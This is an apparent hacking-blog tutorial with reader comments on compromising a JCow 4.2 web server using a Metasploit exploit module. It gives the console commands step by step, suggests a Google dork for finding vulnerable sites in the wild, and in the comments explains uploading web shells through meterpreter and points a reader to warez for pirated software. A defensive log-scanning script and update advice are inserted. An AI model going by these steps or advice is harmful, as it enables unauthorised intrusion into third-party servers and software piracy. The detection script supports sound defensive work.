Type : Tutorial
Level : Medium
Victim Server : Windows XP SP3
Victim vulnerable application : JCow 4.2
Attacker O.S : Backtrack 5 R1
It has been a long time since I last wrote about hacking a web server. Today, "again" while surfing around, I found that the Jcow social networking engine can be exploited, and the exploit is ranked "excellent".
So what actually happens when you run this vulnerable Jcow version? Put simply, the attacker can go through your web server directory and do anything there. For example, if you host a vulnerable Jcow version (on insecure hosting as well), your web server directory can be owned.
In this example, let's say I have a vulnerable Jcow web server at IP address 192.168.8.94. It's better to try this by installing your own web server, but if you want to find Jcow in the wild you can search with the Google dork "intext:Powered by Jcow 4.2.0" and register there as a normal user. In this tutorial I have already registered with the username victim and the password victim.
Okay, I hope you understand what I said above.
To make it more realistic, let's try the tutorial…
2. Jcow.rb exploit
1. Copy the jcow.rb exploit you downloaded from the link above into the /pentest/exploits/framework/modules/exploits/remote/ folder (see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
The "framework" part of the path (shown in blue) is there because I'm using Backtrack 5 R1 with Metasploit v4.0.1. The name depends on your Metasploit version, so on your computer it may be "framework3", "framework2" and so on.
If you don't know how to copy the jcow.rb file into your Backtrack, please refer to the tutorial about Linux folder sharing.
2. Open your Metasploit console and then use the exploit you just added.
msf > use exploit/remote/jcow
3. Next, view the available options for this exploit by running the show options command, and then configure them (see the box in red).
msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set the username
username => victim
msf exploit(jcow) > set password victim --> set the password
password => victim
msf exploit(jcow) > set uri jcow --> only if jcow not in / directory fill it here
uri => jcow
Information :
The uri option is used when Jcow is not installed in the web server's main directory, for example http://web-server.com/jcow.
4. After everything is set up successfully, the next thing to do is run the exploit with the exploit command.
PWNED!
1. Update your Jcow Social Networking to a version > v4.2
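A defender's complement to the update advice, as an added example that is not part of the original tutorial or of the exploit: the exploit output quoted in the comments on this page shows the payload landing at /files/asgRk2.php, so this script flags access-log requests for script files under the Jcow files/ directory. The Apache combined log format, the script-extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache/Nginx "combined" access-log line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Extensions a PHP handler commonly executes (assumption; match your server config).
# The trailing (?:/|$) also catches PATH_INFO requests such as x.php/extra.
SCRIPT_EXT = re.compile(r'\.(?:php\d?|phtml|phar)(?:/|$)', re.IGNORECASE)

# Constructed sample lines; asgRk2.php is the payload name quoted on this page.
SAMPLE_LOG = [
    '192.168.8.50 - - [01/Sep/2011:10:02:10 +0700] "GET /jcow/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.8.50 - - [01/Sep/2011:10:02:11 +0700] "GET /jcow/files/avatar_12.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.168.8.50 - - [01/Sep/2011:10:02:15 +0700] "GET /jcow/files/asgRk2.php HTTP/1.1" 200 128 "-" "-"',
    '192.168.8.50 - - [01/Sep/2011:10:03:40 +0700] "GET /jcow/files/notes.PHP?c=1 HTTP/1.1" 404 310 "-" "-"',
    'truncated line that does not parse',
]


def find_script_hits(lines, base_uri="/"):
    """Return requests for script files under <base_uri>/files/.

    base_uri mirrors the tutorial's `uri` option: "/" for a root install,
    "jcow" when Jcow is installed in a subdirectory.
    """
    upload_dir = ("/" + base_uri.strip("/")).rstrip("/") + "/files/"
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        path = unquote(urlsplit(m["target"]).path)  # drop query, decode %xx
        if path.lower().startswith(upload_dir.lower()) and SCRIPT_EXT.search(path):
            hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                         "path": path, "status": int(m["status"]),
                         # 2xx: the server found the file and ran or served it
                         "served": m["status"].startswith("2")})
    return hits


if __name__ == "__main__":
    for hit in find_script_hits(SAMPLE_LOG, base_uri="jcow"):
        print(hit)
```

Any hit with "served" set to True deserves a look at the file itself, since an upload directory has no reason to serve executable scripts.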
Hope you enjoyed… Any questions? Just drop them below.
Nice tutorial!
Thanks for featuring our exploit.
http://www.exploit-db.com/exploits/17722/
#yehg
You’re welcome, btw thanks also for your exploit…next time when I write the tutorial, I’ll write a credit for the exploit maker
Cool. But how to upload some shell to the server? Didn't understand. Can help me, please?
#Varius
Actually when you’re inside a meterpreter you just need to run shell command to turn into shell. And about how to upload some shell, maybe what you mean was about meterpreter file system command.
Thanks for your reply! I'll read that tutorial mindfully. I'm not a hacker, just using this script on my site. One more question: this line 'Uploading the payload: /files/asgRk2.php' so, if I want to upload some shell into my site, using this exploit, for example, gnyshell.php, what command in metasploit should I use? Thanks in advance
#Varius
You can use meterpreter upload command..
Thank u!
Good day! May I ask you one more question? What payload in metasploit should I use to start meterpreter? What steps do I miss? Because exploit connects to vulnerable script, then this message occurs "Exploit completed, but no session was created."
#Varius
There’s many payload you can use…. use search meterpreter command or you also can use show payloads command.
Thanks a lot! A very useful info I found in this site! You've helped me very much
#Varius
You’re welcome
If someone is interested here can learn about facebook hacking, protecting facebook account, facebook security, hacking tutorials for beginners and something about facebook games.
If you are not interested in this skip the comment and sorry for disturbing.
http://hack-the-facebook.blogspot.com/
Dear Sir, I want your 1 help…please help me…I'm really in a problem…I want jcow professional v7 plus [Full Version] free downloadable link….plz give me the link…Its my dream to start a social networking site..I come from very poor family…plz help me plz….waiting for ur help….
#jjordan
You can search in a warez forum. They have much more resources for nulled scripts, web template and web engine…
Hi there I am so grateful I found your web site, I really found you by accident, while I was researching on Bing for something else, Regardless I am here now and would just like to say thanks a lot for a marvelous post and an all round thrilling blog (I also love the theme/design), I don’t have time to go through it all at the minute but I have bookmarked it and also added in your RSS feeds, so when I have time I will be back to read a lot more, Please do keep up the great work.
I seriously love your blog.. Excellent colors & theme.
Did you make this website yourself? Please reply back as I’m trying to create my own personal blog and want to know where you got this from or exactly what the theme is named. Cheers!
Hello! Would you mind if I share your blog with my zynga group?
There’s a lot of people that I think would really enjoy your content. Please let me know. Thanks
#seo
Sure, as long as you put the link credit to this website without remove the copyright.